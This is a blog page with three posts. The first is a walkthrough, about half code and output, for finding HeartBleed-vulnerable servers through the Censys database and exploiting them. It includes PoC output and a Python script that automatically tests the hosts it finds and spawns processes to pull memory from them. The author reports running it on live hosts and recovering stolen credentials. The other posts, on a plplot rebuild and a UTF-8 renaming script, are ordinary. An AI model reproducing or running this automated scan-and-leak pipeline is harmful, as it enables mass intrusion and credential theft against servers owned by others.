August 2016
« Jun    

Leverage Censys database in your search for well-known vulnerabilities

The Censys Database

Censys is a well-known search engine that allows researches all around the world to ask questions about the hosts and networks that compose The Internet. This is a massive database made of daily zmap and zgrab scans of the entire Ipv4 scope. It can be used free-of-charge and it has its own API with bindings for the most used programming languages, such as Python. So if you need to scan your own huge company network maybe you should consider querying the Censys database instead of running your own zmap scan. If you prefer to query the database offline, you can download part of it to your hard disk and parse it using your own routines. No need to use its API, if you don’t feel like it.

This post will show you how to leverage Censys database in order to look for potential HeartBleed vulnerable servers in all those public servers or devices you could have on the Internet.

Using the search engine

To look for potential HeartBleed vulnerable servers for a particular ip4 class B range, use this expression in the search engine:

W.X.Y.Z/16 and tags: heartbleed

Hopefully you will not get any results. But if you do, make sure all the reported hosts or devices does not have the bug, otherwise you are entirely exposed to anyone that wants to steal data from these hosts. Below, a screen-shot shows that some hosts have been found to be potential vulnerable servers. At least, at the time of scanning they were:

Looking for potential HeartBleed vulnerable servers in Censys Database.

Looking for potential HeartBleed vulnerable servers in Censys Database.

If you don’t set a proper CIDR filter, you will get all the reported hosts that, at the time of scanning, were vulnerable indeed. There are plenty of hosts reported vulnerable, as of writing a total of 229.956 hosts!:

As of writing, there is still an awful lot of potential HeartBleed vulnerable servers on the Internet.

As of writing, there is still an awful lot of potential HeartBleed vulnerable servers on the Internet.

Of course, you can look for any particular service and a lot amount of different tags, so you can actually find almost any particular potential vulnerable server thanks to Censys database without actually performing the scan yourself. All entries have a timestamp that allows you to know when the scan was performed. Chances are that the hosts are not vulnerable or accessible anymore.

 Trying the host

Once you have a list of potential vulnerable servers to the HeartBleed security issue, you can test them and make sure if they are still vulnerable. To do so, choose whatever exploit you prefer (write your own, use Metasploit Framework, or download the python “quick-and-dirty” PoC written by Jared Stafford and modified by Csaba Fitzl). Here we will be using the latter. Download the PoC (written in Python) from here:

You can send one TLS packet to the server and check if the response contains 64KB of data:

~$ proxychains python ip_vulnerable_host

Trying SSL 3.0…
Sending Client Hello…
Waiting for Server Hello…
… received message: type = 22, ver = 0300, length = 86
… received message: type = 22, ver = 0300, length = 2144
… received message: type = 22, ver = 0300, length = 4
Sending heartbeat request…
… received message: type = 24, ver = 0300, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 00 53 43 5B 90 9D 9B 72 0B BC 0C .@….SC[…r…
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H…9…….
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3….f…..”.
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8………5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 …………….

WARNING: server returned more data than it should – server is vulnerable!

Indeed; this host is still vulnerable.


Thanks to Censys API, you can write a program that looks for particular potential vulnerable servers in the database and then test them to make sure whether they are still vulnerable or not. You can either connect the results to an already developed framework (such as Metasploit), or to your own. The flexibility knowns no bounds. For this particular case, I wrote a simple Python script that leverages Censys API to get a list of potential vulnerable servers to the HeartBleed bug and then launches the previous PoC to make sure whether each hosts is still vulnerable and needs to be patched:

import sys
import os
import signal
import getopt
import censys.ipv4
import urllib2
import subprocess
from subprocess import Popen
usage	=	""" HeartBleed data puller, by Toni Castillo Girona
  -q QUERY, the query to perform (it will be prepended to "and tags: heartbleed").
  -d, only QUERY the database and do nothing more (no connections to hosts).
  -c    only check for the vulnerability without capturing more than 64KB.
  -t	DELAY, set the timeout in secons between data pulls.
  -l limit, number of max hosts to be returned.
  -h|-? Get a list of valid arguments.
  Query the database in order to find potential heartbleed vulnerable servers
  in SPAIN:
   ./ -q "location.country_code: ES and tags: heartbleed"
  Locate any potential vulnerable server in the range and test
  the vulnerability:
   proxychains ./ -q "X.Y.0.0/16 and tags: heartbleed" -c 2>/dev/null
  Perform the same command as before but this time limit the results to two hosts and
  spawn a new data-puller process for every vulnerable server in order to retrieve
  data from them:
   proxychains ./ -q "X.Y.0.0/16 and tags: heartbleed" -l 2 2>/dev/null
  Do the same as before but adding an interval of 120 seconds between data pulls:
   proxychains ./ -q "X.Y.0.0/16 and tags: heartbleed" -l 2 -t 120 2>/dev/null
  Get the first 20 potential vulnerable hosts over the IPv4 spectrum:
   ./ -d -l 20
# The API Keys; you must get a valid account from Censys and fill this
# variables accordingly:
UID =""
# Path and name for the Python Exploit PoC:
# Path and name for the Bash script to pull data:
pull = ""
# Default timeout in seconds between data-pulls, 1 minute:
timeout = 60
# By default, the script will not connect to the hosts:
try_host = 0
# By default, return all the hosts:
maxhosts = 0
# Default query:
query = "tags: heartbleed"
# Dry-run; only query the database and do nothing:
dry_run = 0
# The ID and SECRET vars must be present or the script will
# not be able to use CENSYS API to retrieve the information:
if UID == "" or SECRET == "":
	print "Please, set the UID and SECRET variables according to your CENSYS account."
	print "Please visit for additional information."
# Get the script arguments:
	opts, args = getopt.getopt(sys.argv[1:],"dq:l:t:ch?")
except getopt.GetoptError as err:
	print " [*] ERROR: %s" % str(err)
# Process the arguments
for option, value in opts:
	# Only query the database, don't try to check the vulnerability.
	# This ignores -t and -c
	if option == "-d":
		dry_run = 1
	# Set the query:
	if option == "-q":
		query = value
	# Set the timeout
	if option == "-t":
			timeout = int(value)
			print value , " is not a valid numeric value."
	# Connect to the hosts?:
	if option == "-c":
		try_host = 1
	# Set the total number of hosts to be returned:
	if option == "-l":
			maxhosts = int(value)
			print value, " is not a valid numeric value."
	# Help:
	if option in ("-h","-?"):
		print usage
ipv4s = censys.ipv4.CensysIPv4(UID, SECRET)
# The fields we want in the resultset. Apart from the web, the field "tags"
# will hold any additional opened port for any host in the database:
fields = ["ip", "protocols"]
# Command pool for "data-pulling":
pulling = []
host = 1
vuln = 0
# Query and iterate throught Censys Database:
for ip in
	# We have reached the last host to be returned:
	if maxhosts >0 and host > maxhosts:
	ports = ""
   	# Let's parse the protocols field:
	for port in ip["protocols"]:
		ports += port + " "
	#Let's get when this entry has been updated in the database:
	updated = ipv4s.view(ip["ip"])
	# Print this host ip and ports:
	print ip["ip"] , "Ports: [" , ports , "]" , "Updated at: " , updated["updated_at"],
	# In case we have set the "-c" flag, it will try to capture the first 64KB-chunk
	# of data. Otherwise, it will spawn a new thread in order to start the data
	# pulling procedure.
	# Of course, the first 64KB-chunk pulling happens always!
	if dry_run == 0:
		# Prepare the command to be executed:
		cmd = "./" + exploit + " " + ip["ip"] + " >/dev/null"
		cmd_pull = "./" + pull + " " + ip["ip"] + " " + str(timeout) + "s >/dev/null"
		# Test the vulnerability by sending ONE packet:
		res =,shell=True)
		if res == 0:
			vuln = 1
			print "VULNERABLE"
			vuln = 0
		# If we want to test the vulnerability and nothing else,
		# get the next potential vulnerable host; otherwise
		# spawn a new process and start capturing data:
		if try_host == 0 and vuln==1:
			# Add this new command to the pool:
# After gathering all the vulnerable hosts, start collecting data in parallel.
# If the flag "-d" has been set, len(pulling)=0, therefore nothing will be done:
if try_host == 0 and len(pulling)>0:
    print "Spawning", len(pulling), "processes for pulling data ..."
    ps = [Popen(c, shell=True, preexec_fn=os.setsid) for c in pulling]
    # The processes will be executed in parallel.
    # We allowed here to kill all the spawning processes at will:
    while 1:
        print "Kill the processes [yY]?: ",
        key = raw_input()
        if key in ("Y","y"):
            for p in ps:
                print "Killing process",
                os.killpg(os.getpgid(, signal.SIGKILL)
            # Exit the script:

This script allows me to start a new parallel process for each proven vulnerable host to start pulling data from its memory, storing it in its own log file for further analysis. As you can see, it is a piece of cake to write a quick-and-dirty script that takes advantage of the Censys Database in order to look for potential vulnerable servers and use that information to either test or exploit the vulnerable servers automatically. Unluckily for us, the bad ones are doing precisely so.

Running my script

Setting a filter to make sure my script only searchs for potential HeartBleed vulnerable servers in a certain Ipv4 range, I found a bunch of them. With the -l flag, my script limit the results to the first two vulnerable hosts, then tests them and spawns 2 processes to start pulling data from their memory. After a while, I stop the processes and the data-pulling ends:

proxychains ./ -q “X.Y.0.0/16 and tags: heartbleed” -l 2 2>/dev/null
ProxyChains-3.1 (
X.Y.Z.187 Ports: [ 443/https ] Updated at: 2016-06-24T09:11:39+00:00 VULNERABLE
X.Y.Z.123 Ports: [ 443/https ] Updated at: 2016-04-20T20:18:29+00:00 VULNERABLE
Spawning 2 processes for pulling data …
Kill the processes [yY]?: y
Killing process 18680
Killing process 18681

Having a look at the log files, I found some credentials, as shown in the next screen-shot:

Stolen credentials from a vulnerable server's memory.

Stolen credentials from a vulnerable server’s memory.


Censys database is a massive place to look for potential vulnerable servers. It can be used in so many ways; this post has given an example of how to leverage it and use its API.


plplot5.9.9 libraries on Ubuntu Xenial 16.04 segfault

The issue

According to some professors working in my department, newer versions of the plplot library ship with an entirely new API, rendering all that legacy scientific code unusable. So instead of re-writing all the code that make use of the plplot routines, they have asked me to install a previous version prior to all these changes. Plplot 5.9.9, that ships out-of-the-box with Debian Wheezy distros, is as good as any.

After compiling the original debian package on some modern GNU/Linux distros and testing that all was running fine, I did the same on an Ubuntu 16.04 (Xenial) box. However, this time I was not that lucky; running a scientific piece of code that made use of plplot 5.9.9 crashed:

./plp_preccyl < plp_input
-164.213572416971 173.427378522441
Aborted (core dumped)

Compiling the binary with Debugging Symbols

I added the debugging symbols to the plp_proccyl binary in order to trace the segmentation fault, and then I re-run the code inside a gdb session:

(gdb) run < plp_input
Starting program: /src/test/plp_preccyl < plp_input
[Thread debugging using libthread_db enabled]
Using host libthread_db library “/lib/x86_64-linux-gnu/”.
[New Thread 0x2aaac0a5f700 (LWP 3510)]
[New Thread 0x2aaac0c60700 (LWP 3511)]
[New Thread 0x2aaac0e61700 (LWP 3512)]
[New Thread 0x2aaac19ec700 (LWP 3513)]
[New Thread 0x2aaac1bed700 (LWP 3514)]
-164.213572416971 173.427378522441
[Thread 0x2aaac1bed700 (LWP 3514) exited]

Thread 1 “plp_preccyl” received signal SIGSEGV, Segmentation fault.
0x00002aaabbb2512d in gtk_container_add () from /usr/lib/x86_64-linux-gnu/

Once the segfault was triggered, I used the bt command to see the program’s back-trace:

(gdb) bt
#0 0x00002aaabbb2512d in gtk_container_add ()
at /plplot-5.9.9/drivers/qt.cpp:104
#11 0x00002aaab2342dfd in plD_init_rasterqt (pls=0x2aaaaaf2ddc0 <pls0>)
at /plplot-5.9.9/drivers/qt.cpp:278
#12 0x00002aaaaacea5b9 in plP_init () at /plplot-5.9.9/src/plcore.c:140
#13 0x00002aaaaacef004 in c_plinit () at /plplot-5.9.9/src/plcore.c:2248
#14 0x000000000040c4c2 in start_plot (device=…, kdev=168004192,
filename=<error reading variable: Cannot access memory at address 0x18>,
icolmap=<error reading variable: Cannot access memory at address 0x0>,
.tmp.DEVICE.len_V$d40=166761088, .tmp.FILENAME.len_V$d43=35) at plp_preccyl.f:2173
#15 0x0000000000414b3c in make_plot_z (pzvz=…, nrp=168004192,
ntp=<error reading variable: Cannot access memory at address 0x18>,

According to the back-trace, the segmentation fault was fired during the plotting routine using the qt driver. So I decided to try a quick-and-dirty fix; re-compile plplot without support for the qt driver.

Disabling the qt driver

To disable the support for the qt driver inside the plplot library, I set the directive DEFAULT_NO_QT_DEVICES to ON in  cmake/modules/drivers-init.cmake:

“Disable all qt devices by default (ON) or enable qt devices individually by default (OFF)”

Then I cleaned plplot5.9.9 build directory and re-built it from scratch:

debian/rules clean

debian/rules binary

Once the building process was finished, I re-installed it under the directory /usr/local/plplo599:

cd debian/build_tmp && make install

Finally, I re-compiled the plp_preccyl program and I re-run it. This time, the program finished its execution with no issues at all, plotting all the figures in different graphic formats (png, eps, pdf).

 The binaries

If you need this particular version of plplot and you are running an Ubuntu 16.04 64-bit (Xenial), you can get the binaries from here. Decompress them under /usr/local and make sure to change your Makefiles accordingly to make use of the new include and lib directories. Before running your program, don’t forget to set the LD_LIBRARY_PATH environment variable to match plplot5.9.9 lib directory!

utf-8-py: a script that fixes ownCloud non-UTF8 filenames issues

The script

Some months ago I had to face an annoying issue that affected the ownCloud client during the folder-synchronization process. As a result of that I wrote a trivial python script that helped me fix rename the non-UTF8 filenames using the UTF-8 encoding. Today I had to deal with the very same issue, so I decided to add some functionality to the original script I wrote.


This script has been written in Python 2.7. This is what you will need in order to execute the script:

  • Python 2.7.
  • The conmv utility. (# apt-get install convmv).
  • The Python Chardet module (# apt-get install python-chardet).
  • The script itself,

Using the script

./ -d PATH [-t THRESHOLD][-l LOG][-r ]

-d PATH:

The directory to analyse and, if the -r flag is given, to fix (i.e., all the files and directories inside the PATH directory will be renamed according to the UTF-8 encoding standard).


The Chardet module has a value called “confidence”.  This value offers a quantized factor for any particular detected charset. By using the -t flag, one can set the minimal value for confidence that a particular detected charset must match before attempting to rename the file or directory using UTF-8. This is a numerical value in the range [0..1]. Default value: 0.8.

-l LOG

By default, the script will create a logfile in the same directory where it is executed called utf8-log.txt. Passing this flag, one can choose where the logfile should be and its name.


By default, the execution of the script is a dry-run; i.e., the files and directoris of PATH will not be renamed. Therefore, by passing the script this flag, the files and directories inside PATH will be renamed.


This command will generate a log file under /tmp/analysis.log for the directory /home/data, detecting any non-UTF8 charset with a default confidence of 0.8. No file or directory renaming will take place, so the directory /home/data will remain unchanged:

./ -d /home/data -l /tmp/analysis.log

This command will rename any file and directory under /home/data that has a minimal value of 0.95 for confidence, the rest will not be renamed:

./ -d /home/data -l /tmp/renamed.log -t 0.95 -r

Download the script

You can get the latest version for this script right here.